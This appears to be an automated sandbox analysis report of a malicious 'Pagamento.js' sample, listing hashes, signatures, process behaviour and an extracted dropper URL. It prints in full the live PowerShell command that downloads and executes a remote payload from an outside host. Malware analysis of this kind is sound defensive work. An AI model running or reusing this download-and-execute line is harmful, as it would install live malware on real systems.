Analysis
- max time kernel: 31s
- max time network: 33s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 29-05-2023 23:15
- Static task: static1
- Behavioral task: behavioral1
  - Sample: Pagamento.js
  - Resource: win7-20230220-en (windows7-x64)
  - 5 signatures
  - 150 seconds
General
- Target: Pagamento.js
- Size: 169KB
- MD5: c0871f07733a3727e82c64aacda9a85b
- SHA1: bf364b5b56ee65351a0bc5bca249ddeed5705e76
- SHA256: 3eafb742af9d3a8bbbe4bd90b19d175ea4b698505cc5623594d0f13ba883692e
- SHA512: 56f29de9c7b558ad3e24ee52378ce297bccfcc95bdeb74f3ec463493fe25dd2f869f1d74ede8238fe82b9bb11b9f088d47dea1df53f2a0a1b3a7a6c0ad29217e
- SSDEEP: 3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKLfbT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokX0bZ0M/EaZ8M
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs:
  - ps1.dropper: https://propagandaetrafego.com/b.jpg
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes:
    flow  pid   process
    4     1284  powershell.exe
    5     1284  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   process
    1284  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  1284  powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                        pid   process      target process
    PID 1128 wrote to memory of 1284   1128  wscript.exe  powershell.exe
    PID 1128 wrote to memory of 1284   1128  wscript.exe  powershell.exe
    PID 1128 wrote to memory of 1284   1128  wscript.exe  powershell.exe
Processes
- C:\Windows\system32\wscript.exe (1)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\Pagamento.js
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Downloads
- memory/1284-58-0x000000001B210000-0x000000001B4F2000-memory.dmp (Filesize: 2.9MB)
- memory/1284-60-0x00000000024B0000-0x0000000002530000-memory.dmp (Filesize: 512KB)
- memory/1284-61-0x00000000024B0000-0x0000000002530000-memory.dmp (Filesize: 512KB)
- memory/1284-59-0x0000000002320000-0x0000000002328000-memory.dmp (Filesize: 32KB)
- memory/1284-62-0x00000000024B0000-0x0000000002530000-memory.dmp (Filesize: 512KB)